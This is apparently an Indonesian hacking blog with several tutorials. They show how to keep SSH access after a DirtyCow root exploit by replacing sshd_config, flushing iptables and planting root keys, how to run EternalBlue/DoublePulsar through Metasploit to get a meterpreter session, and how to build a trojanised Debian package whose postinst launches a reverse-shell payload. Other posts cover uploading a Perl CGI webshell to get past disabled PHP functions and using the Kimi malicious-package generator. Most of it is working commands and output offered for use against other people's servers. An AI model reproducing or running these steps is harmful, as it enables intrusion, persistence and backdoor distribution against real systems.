Exploit

Mendapatkan Akses SSH Setelah Rooting Server

June 1, 2017 by Jack Wilder 4 Comments

Haloo.. kali ini saya mau berbagi sedikit tips saja barangkali ada yang belum tau. Biasanya yang pernah rooting server dengan localroot dirtyc0w sering pas sudah eskalasi, add user dan ganti password ternyata tidak bisa masuk ke ssh karena port ssh yang diganti, atau password auth dimatikan (sysadmin server tersebut login menggunakan auth key). Ada juga kasus dimana proses privilege escalation langsung memanggil tty dengan id root, namun ketika menambahkan user tidak bisa karena akses ke perintah seperti passwd iptables, dll dibatasi.

Oke kita bahas dulu kasus pertama.

dirty cow exploit – eksekusi localroot – ganti user dan password – tidak bisa masuk ke ssh.

Kemungkinan nya ada dua, tidak diijinkan login dengan password , atau memang ssh hanya bisa diakses melalui ip tertentu saja (pengaturan iptables).

Trik nya :

su firefat
cd /etc/ssh/
rm sshd_config
wget https://raw.githubusercontent.com/linuxsec/pentest/master/sshd.txt -O sshd_config
iptables -F
service ssh restart

Perintah diatas akan menghapus konfigurasi ssh yang dilakukan sysadmin dan mengembalikannya ke pengaturan default dimana password login diijinkan dan port nya di port 22. iptables -F adalah melakukan flushing iptables. Hal ini untuk menghapus semua rule iptables yang ada. Sehingga misalnya rule awal hanya mengijinkan ip tertentu login ke ssh, sekarang kita bisa login ke ssh dari ip kita.

Yang pertama diatas adalah yang kasus paling gampang nya. Nah yang kedua ini lumayan banyak juga

dirty cow exploit – eksekusi localroot – ganti user dan password – tidak bisa masuk ke ssh – /bin/su denied

Nah kalau yang ini, kita gunakan trik berikut.

Kita lakukan eskalasi server dengan localroot yang langsung memanggil tty dengan id root.

Sehingga proses nya menjadi

exploit – run – id root

log :

./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 30768
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don’t forget to restore /tmp/bak
thread stopped
thread stopped
[email protected] [/home/bugs/public_html/]#

karena id kita sekarang root kita tinggal mengikuti perintah di kasus pertama. Reset sshd config, flush iptables, add user setara root.

Nah kasus yang ketiga

exploit – tty dengan id root – tidak bisa menjalankan perintah passwd, iptables dan perintah lainnya.

Hal ini kemungkinan akses ke perintah sistem dibatasi saat kita menggunakan tty.

Log :

[email protected] [/root]# /usr/sbin/useradd kontol -g root -d /home/kontol
/usr/sbin/useradd kontol -g root -d /home/kontol
[email protected] [/root]# passwd kontol
passwd root
[email protected] [/root]#

yup, prompt password tidak mau terpanggil.

Ini dikarenakan akses di tty dibatasi. bahkan meski memiliki id root kita tidak bisa menjalankan perintah iptables.

Trik yang saya coba dan work :

cd ~
ssh-keygen -t rsa
cp /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
ssh [email protected]

Kita gunakan akses ssh menggunakan auth key. Kenapa di localhost, kenapa tidak langsung pakai auth key dari server kita ? Disini saya asumsikan firewall server target aktif dan hanya mengijinkan akses ssh dari ip tertentu saja.

Setelah add ssh key, berikut log nya :

[email protected] [~]# ssh [email protected]
ssh [email protected]
Attempting to create directory /root/perl5
[email protected] [~]#

Memang terlihat sama namun yang pertama adalah tty, dan yang kedua adalah ssh shell.

Sekarang karena yang kita punya bukan tty lagi seharusnya limit atau batasan perintah seperti tidak bisa command iptables, tidak bisa command passwd sudah tidak ada. Selanjutnya tinggal ikuti ara paling atas .

Sekian tutorial kali ini, semoga bermanfaat.

Samba 3.5.0 – Remote Code Execution (CVE-2017-7494) Metasploit

May 26, 2017 by Jack Wilder Leave a Comment

Hmm sepertinya Remote Code Exploit juga menyerang Samba File Sharing di Linux nih? Akankah ada versi WannaCry Linux yang memanfaatkan celah ini? Atau harusnya diberi nama Sambacry?

SMB Remote Code Execution (MS17-010) Eternalblue and Doublepulsar Exploit

May 3, 2017 by Jack Wilder 20 Comments

Kayaknya lagi rame ya exploit ini. Lumayan telat sih kalo saya baru nulis sekarang. kemarin kemarin pun sebenernya males nulis karena udh banyak yang bahas. Berhubung tadi ada yang nanya di fanspage tentang tutorial ini yaudah biar sekalian blog ada isinya.

Exploit ini sebenarnya adalah “private exploit” milik NSA yang berhasil dibocorkan yaitu shadowbroker.

Doublepulsar adalah backdoor yang menginjeksi dan menjalankan kode berbahaya di system operasi target, dan ini diinstall menggunakan exploit Eternalblue yang menyerang service SMB file-sharing. Mirip seperti MS08_067 yang menyerang Windows XP dan Windows Server 2003, MS17-010 yang bersifat remote exploit ini juga tidak membutuhkan backdoor yang harus diinstall secara manual (payload yang diklik oleh korban). Syaratnya, di sistem target service SMB sedang berjalan.

Berikut list sistem operasi Windows yang terinfeksi :

Windows XP (all services pack) (x86) (x64)
Windows Server 2003 SP0 (x86)
Windows Server 2003 SP1/SP2 (x86)
Windows Server 2003 (x64)
Windows Vista (x86)
Windows Vista (x64)
Windows Server 2008 (x86)
Windows Server 2008 R2 (x86) (x64)
Windows 7 (all services pack) (x86) (x64)

Okelah langsung saja apa yang peru disiapkan.

Wine dan NET Framework
Metasploit

Sebelumnya update metasploit terlebih dahulu. Karena di metasploit terbaru sudah ada module scanner untuk MS17-010 .

sudo msfupdate

Semuanya sudah siap? Oke sekarang kita coba download exploit nya.

su
cd ~
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd cd Eternalblue-Doublepulsar-Metasploit/
cp eternalblue_doublepulsar.rb /opt/metasploit-framework/modules/exploit/windows/smb/

Oke waktunya beraksi (lebay wkwkwk).

Dalam tutorial ini ip target yang digunakan adalah 192.168.48.153. Silahkan sesuaikan sendiri ya.

msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.48.153
run

Nah jika target nya vuln akan muncul notis yang menunjukkan informasi sistem operasi yang berjalan beserta arsitektur yang dipakai.

Liat gambar aja lebih jelas nya :

Oke target sudah dipastikan vuln. Sekarang kita exploit.

use exploit/windows/smb/eternalblue_doublepulsar
show options

untuk DOUBLEPULSARPATH dan ETERNALBLUEPATH sesuaikan dengan lokasi dimana kalian mendownload file di github nya tadi ya. Itulah kenapa diatas saya ngeclone ke folder root biar gak perlu ngeganti path lagi.

Untuk WINEPATH ya isi dengan drive_c dari wine mu. Gak perlu dijelasin lagi. TARGETARCHITECTURE juga harus diperhatikan karena akan berpengaruh saat proses pembuatan backdoor.

Untuk payload secara default menggunakan arsitektur x86 (windows/meterpreter/reverse_tcp) .

Namun jika targetmu menggunakan 64bit ubah dengan perintah

set payload windows/x64/meterpreter/reverse_tcp

untuk lhost dan lport sesuaikan sendiri.

Kalau sudah oke, langsung jalankan exploit nya.

Contoh output :

msf exploit(eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.48.1:4444
[*] 192.168.48.153:445 - Generating Eternalblue XML data
[*] 192.168.48.153:445 - Generating Doublepulsar XML data
[*] 192.168.48.153:445 - Generating payload DLL for Doublepulsar
[*] 192.168.48.153:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.48.153:445 - Launching Eternalblue...
[+] 192.168.48.153:445 - Backdoor is already installed
[*] 192.168.48.153:445 - Launching Doublepulsar...
[*] Sending stage (957487 bytes) to 192.168.48.153
[*] Meterpreter session 2 opened (192.168.48.1:4444 -> 192.168.48.153:49166) at 2017-05-03 13:41:54 +0700
[+] 192.168.48.153:445 - Remote code executed... 3... 2... 1...

meterpreter > sysinfo
Computer        : WIN-KPGGKF4MPSR
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

Oke cukup jelas kan ? Sekian tutorial kali ini, jika ada yang kurang jelas silahkan komentar atau bisa langsung pm ke fanspage maupun fb saya.

How to Hack Linux Using Metasploit !

March 7, 2017 by Jack Wilder 4 Comments

Oke kali ini kita akan membahas kembali mengenai Metasploit. Sebelumnya kita sudah membahas payload PHP yang bisa digunakan untuk meretas sistem linux, kali ini akan sedikit berbeda. Oke langsung saja kita mulai.

A. Pengertian
Mungkin dari beberapa pembaca disini sudah mengetahui apa itu metasploit,

B. Latar Belakang
Banyak orang bilang bahwa linux itu aman dari virus, saya sendiri awalnya juga menganggap seperti itu,disini saya akan sedikit berbagi mengenai How to hack linux using Metasploit !.

C. Tahap Pelaksanaan

Sebelum mengikuti tutorial sebaiknya anda memakai os Linux (Direkomendasikan Memakai Os Pentest seperti Backbox,Kali Linux,dll)
Disini saya memanfaatkan VMware sebagai tumbalnya
Tentunya ada koneksi internet yang nanti untuk mendownload sebuah Package
Buka terminal anda dan masukin perintah seperti dibawah ini

[email protected]:~# apt-get –download-only install xboard
Setelah itu buatlah sebuah folder di tmp dengan memasukan perintah seperti dibawah ini

[email protected]:~# mkdir /tmp/linuxsec
Lalu pindahkan package xboard ke folder yang baru saja tadi dibuat, seperti dibawah ini

[email protected]:~# mv /var/cache/apt/archives/xboard_4.7.3-1_amd64.deb /tmp/linuxsec
Setelah itu masuk ke folder yang baru saja di buat,masukan perintah seperti ini

[email protected]:/tmp/linuxsec# dpkg -x xboard_4.7.3-1_amd64.deb gamerat
[email protected]:/tmp/linuxsec# mkdir gamerat/DEBIAN
Masuk ke folder DEBIAN lalu buat file “control” dan isilah file tersebut seperti dibawah ini

Package: Xboard
Version: 1.0.0
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: Mohon Bersabar Ini Ujian

note : Description bisa anda ubah
Kalau sudah buatlah file lagi yaitu “postinst”, dan isi filenya seperti dibawah ini

#!bin/sh
sudo chmod 2755 /usr/games/xboard_nilai && /usr/games/xboard_nilai & /usr/games/xboard &
Setelah itu kita buat payloadnya,masukan perintah seperti dibawah ini

[email protected]:~# msfvenom -a x86 –platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.117.1 LPORT=1337 -b “x00” -f elf -o /tmp/linuxsec/gamerat/usr/games/xboard_nilai

note : ubah path yang saya kasih warna merah dengan path anda, dan ubah ip sama port yang saya kasih warna hijau sesuai konfigurasi awal anda
Setelah itu kasih hak akses dan build package tersebut, dengan memasukan perintah seperti dibawah ini

[email protected]:~# cd /tmp/linuxsec/gamerat/DEBIAN
[email protected]:/tmp/linuxsec/gamerat/DEBIAN# chmod 755 postinst
[email protected]:/tmp/linuxsec/gamerat/DEBIAN# cd /tmp/linuxsec/
[email protected]:/tmp/linuxsec/# dpkg-deb –build gamerat
Setelah itu copy trojannya taruh di /var/www atau /var/www/html
Trojan kita sudah jadi sekarang anda eksekusi filenya di VMware Dan Meremotenya,,caranya gimana ?
Installah terlebih dahulu gufw < pengertian dan cara penggunaan anda bisa cari di google
Lalu buka Terminal anda ketikan perintah seperti dibawah ini

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.117.1
lhost => 172.16.117.1
msf exploit(handler) > set lport 1337
lport => 1337
msf exploit(handler) > exploit
Setelah itu di OS Guest(Os linux yang dijadikan tumbal ,sudah terinstall di vmware)
Masuk ke OS Guest Guset tersbut dan download file anda, dengan memasukan perintah seperti berikut

wget http://172.16.117.1/gamerat.deb
Masih di Os Guest > eksekusi filenya dengan memamuskan perintah

[email protected]:/home/guestos# chmod +x gamerat.deb
[email protected]:/home/guestos# dpkg -i gamerat.deb
Lihat apa yang terjadi di metasploit console anda di Os Host

Kalu muncul seperti gambar dibawah ini berarti anda sukses mengikuti tutorial seperti diatas

Kalau anda masih belum paham dengan tutorial diatas anda bisa melihat video di bawah ini

Bypass Disabled Functions Dengan Perl CGI Webshell

March 4, 2017 by Jack Wilder 1 Comment

Sebenernya ini trik lama banget ya. Cuman berhubung masih banyak yang belum tau jadi coba share aja barangkali ada yang mau baca.

Pernah gak nemu server yang disabled functionnya banyak banget.

Yang paling parah kalau fungsi exec nya di disable.

Di beberapa server “tua” bisa di bypass dengan trik add php.ini dan menambahkan value disable function ke “off”. Sayangnya di server sekarang trik bypass seperti itu kadang tidak berjalan.

Nah kita bisa membypass nya dengan CGI Shell.

Download CGI Shell

pass : jkt48

Nah selanjutnya upload shell tersebut di web target.

Biar gampang buat direktori baru aja lalu upload shell cgi nya disitu.

Selanjutnya buat file .htaccess di folder tempat cgi shell tadi dan isinya :

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddType application/x-httpd-cgi .pl
AddHandler server-parsed .php
AddHandler cgi-script .pl
AddHandler cgi-script .pl

Setelah itu buka shell nya.

Masukkan password : jkt48

Sekarang kalian bisa menjalankan perintah linux seperti biasa meskipun shell exec di disable.

Nah sebagai tambahan, untuk bypass symlink bisa baca artikel berikut :

Simple Bypass Internal Server Error Symlink 2016

Untuk bypass config bisa baca disini :

Trik Bypass Config

Oke sekian tutorial kali ini, semoga bermanfaat.

Kimi – Malicious Debian Package Generator

February 28, 2017 by Jack Wilder Leave a Comment

Kimi adalah tool yang ditulis dengan bahasa python oleh ChaitanyaHaritash. Tool ini berguna untuk membuat payload berekstensi .deb (paket debian).

Menurut pembuatnya, nama Kimi sendiri diambil dari salahsatu karakter di serial Naruto, “Kimimaro”.

Karena fungsinya untuk membuat paket debian, jelas target nya adalah sistem operasi Debian dan turunannya.

Kelebihan Kimi :

Independen. Artinya tool ini tidak membutuhkan aplikasi lain.
Dapat diintegrasikan dengan payload generator lain.

Get Start

git clone https://github.com/ChaitanyaHaritash/kimi.git

cd kimi

sudo python kimi.py -h

Cara membuat payload :

sudo python kimi.py -n nama paket -l ip kita -V versi software

Setting up Web_Delivery di msf :

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Oke sekian tutorial kali ini, happy hacking 😉 .